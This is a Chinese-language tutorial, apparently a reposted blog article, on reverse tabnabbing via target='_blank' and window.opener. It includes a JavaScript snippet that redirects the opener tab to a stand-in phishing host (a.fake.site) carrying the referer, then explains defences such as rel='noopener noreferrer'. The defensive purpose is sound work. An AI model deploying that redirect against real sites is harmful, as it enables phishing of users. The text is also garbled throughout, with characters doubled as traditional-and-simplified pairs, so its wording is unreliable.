在網(wǎng)頁(yè)中使用鏈接時(shí)，如果想要讓瀏覽器自動(dòng)在新的標(biāo)簽頁(yè)打開(kāi)指定的地址，通常的做法就是在 a 標(biāo)簽上添加 target等于"_blank" 屬性。

然而，就是這個(gè)屬性，為釣魚(yú)攻擊者帶來(lái)了可乘之機(jī)。

起源

parent 與 opener

在說(shuō) opener 之前，可以先聊聊 <iframe> 中的 parent。

我們知道，在 <iframe> 中提供了一個(gè)用于父子頁(yè)面交互的對(duì)象，叫做 window.parent，我們可以通過(guò) window.parent 對(duì)象來(lái)從框架中的頁(yè)面訪(fǎng)問(wèn)父級(jí)頁(yè)面的 window。

opener 與 parent 一樣，只不過(guò)是用于 <a target="_blank"> 在新標(biāo)簽頁(yè)打開(kāi)的頁(yè)面的。通過(guò) <a target="_blank"> 打開(kāi)的頁(yè)面，可以直接使用 window.opener 來(lái)訪(fǎng)問(wèn)來(lái)源頁(yè)面的 window 對(duì)象。

同域與跨域

瀏覽器提供了完整的跨域保護(hù)，在域名相同時(shí)，parent 對(duì)象和 opener 對(duì)象實(shí)際上就直接是上一級(jí)的 window 對(duì)象；而當(dāng)域名不同時(shí)，parent 和 opener 則是經(jīng)過(guò)包裝的一個(gè) global 對(duì)象。這個(gè) global 對(duì)象僅提供非常有限的屬性訪(fǎng)問(wèn)，并且在這僅有的幾個(gè)屬性中，大部分也都是不允許訪(fǎng)問(wèn)的（訪(fǎng)問(wèn)會(huì)直接拋出 DOMException）。

在 <iframe> 中，提供了一個(gè) sandbox 屬性用于控制框架中的頁(yè)面的權(quán)限，因此即使是同域，也可以控制 <iframe> 的安全性。

利用

如果，你的網(wǎng)站上有一個(gè)鏈接，使用了 target="_blank"，那么一旦用戶(hù)點(diǎn)擊這個(gè)鏈接并進(jìn)入一個(gè)新的標(biāo)簽，新標(biāo)簽中的頁(yè)面如果存在惡意代碼，就可以將你的網(wǎng)站直接導(dǎo)航到一個(gè)虛假網(wǎng)站。此時(shí)，如果用戶(hù)回到你的標(biāo)簽頁(yè)，看到的就是被替換過(guò)的頁(yè)面了。

詳細(xì)步驟

1.在你的網(wǎng)站 https://example.com 上存在一個(gè)鏈接： 

<a href="https://an.evil.site" target="_blank">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a> 

2.用戶(hù)點(diǎn)擊了這個(gè)鏈接，在新的標(biāo)簽頁(yè)打開(kāi)了這個(gè)網(wǎng)站。這個(gè)網(wǎng)站可以通過(guò) HTTP Header 中的 Referer 屬性來(lái)判斷用戶(hù)的來(lái)源。

并且，這個(gè)網(wǎng)站上包含著類(lèi)似于這樣的 JavaScript 代碼：

const url = encodeURIComponent('{{header.referer}}'); 
window.opener.location.replace('https://a.fake.site/?' + url);  

3.此時(shí)，用戶(hù)在繼續(xù)瀏覽這個(gè)新的標(biāo)簽頁(yè)，而原來(lái)的網(wǎng)站所在的標(biāo)簽頁(yè)此時(shí)已經(jīng)被導(dǎo)航到了 https://a.fake.site/?https%3A%2F%2Fexample.com%2F。

4.惡意網(wǎng)站 https://a.fake.site 根據(jù) Query String 來(lái)偽造一個(gè)足以欺騙用戶(hù)的頁(yè)面，并展示出來(lái)（期間還可以做一次跳轉(zhuǎn)，使得瀏覽器的地址欄更具有迷惑性）。

5.用戶(hù)關(guān)閉 https://an.evil.site 的標(biāo)簽頁(yè)，回到原來(lái)的網(wǎng)站………………已經(jīng)回不去了。

上面的攻擊步驟是在跨域的情況下的，在跨域情況下，opener 對(duì)象和 parent 一樣，是受到限制的，僅提供非常有限的屬性訪(fǎng)問(wèn)，并且在這僅有的幾個(gè)屬性中，大部分也都是不允許訪(fǎng)問(wèn)的（訪(fǎng)問(wèn)會(huì)直接拋出 DOMException）。

但是與 parent 不同的是，在跨域的情況下，opener 仍然可以調(diào)用 location.replace 方法而 parent 則不可以。

如果是在同域的情況下（比如一個(gè)網(wǎng)站上的某一個(gè)頁(yè)面被植入了惡意代碼），則情況要比上面嚴(yán)重得多。

防御

<iframe> 中有 sandbox 屬性，而鏈接，則可以使用下面的辦法：

1. Referrer Policy 和 noreferrer

上面的攻擊步驟中，用到了 HTTP Header 中的 Referer 屬性，實(shí)際上可以在 HTTP 的響應(yīng)頭中增加 Referrer Policy 頭來(lái)保證來(lái)源隱私安全。

Referrer Policy 需要修改后端代碼來(lái)實(shí)現(xiàn)，而在前端，也可以使用 <a> 標(biāo)簽的 rel 屬性來(lái)指定 rel="noreferrer" 來(lái)保證來(lái)源隱私安全。 

<a href="https://an.evil.site" target="_blank" rel="noreferrer">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a> 

但是要注意的是：即使限制了 referer 的傳遞，仍然不能阻止原標(biāo)簽被惡意跳轉(zhuǎn)。

2. noopener

為了安全，現(xiàn)代瀏覽器都支持在 <a> 標(biāo)簽的 rel 屬性中指定 rel="noopener"，這樣，在打開(kāi)的新標(biāo)簽頁(yè)中，將無(wú)法再使用 opener 對(duì)象了，它為設(shè)置為了 null。 

<a href="https://an.evil.site" target="_blank" rel="noopener">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a> 

3. JavaScript

noopener 屬性看似是解決了所有問(wèn)題，但是...瀏覽器的兼容性問(wèn)題...

可以看到，現(xiàn)在絕大多數(shù)瀏覽器都已經(jīng)兼容了 rel="noopener" 屬性了。但是，為了保護(hù)稍舊的“近代”瀏覽器或是很舊的“古代”瀏覽器甚至是“遠(yuǎn)古”瀏覽器，只有 noopener 屬性還是遠(yuǎn)遠(yuǎn)不夠的。

這時(shí)，就只能請(qǐng)出下面這段原生 JavaScript 來(lái)幫忙了。 

"use strict";  
function openUrl(url) {  
  var newTab = window.open();  
  newTab.opener = null;  
  newTab.location = url;  
}  

推薦

首先，在網(wǎng)站中的鏈接上，如果使用了 target="_blank"，就要帶上 rel="noopener"，并且建議帶上 rel="noreferrer"。類(lèi)似于這樣： 

<a href="https://an.evil.site" target="_blank" rel="noopener noreferrer">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a> 

當(dāng)然，在跳轉(zhuǎn)到第三方網(wǎng)站的時(shí)候，為了 SEO 權(quán)重，還建議帶上 rel="nofollow"，所以最終類(lèi)似于這樣： 

<a href="https://an.evil.site" target="_blank" rel="noopener noreferrer nofollow">進(jìn)入一個(gè)“邪惡”的網(wǎng)站</a> 

性能

最后，再來(lái)說(shuō)說(shuō)性能問(wèn)題。

如果網(wǎng)站使用了 <a target="_blank">，那么新打開(kāi)的標(biāo)簽頁(yè)的性能將會(huì)影響到當(dāng)前頁(yè)面。此時(shí)如果新打開(kāi)的頁(yè)面中執(zhí)行了一個(gè)非常龐大的 JavaScript 腳本，那么原始標(biāo)簽頁(yè)也會(huì)受到影響，會(huì)出現(xiàn)卡頓的現(xiàn)象（當(dāng)然不至于卡死）。

而如果在鏈接中加入了 noopener，則此時(shí)兩個(gè)標(biāo)簽頁(yè)將會(huì)互不干擾，使得原頁(yè)面的性能不會(huì)受到新頁(yè)面的影響。 

原文鏈接：https://knownsec-fed.com/2018...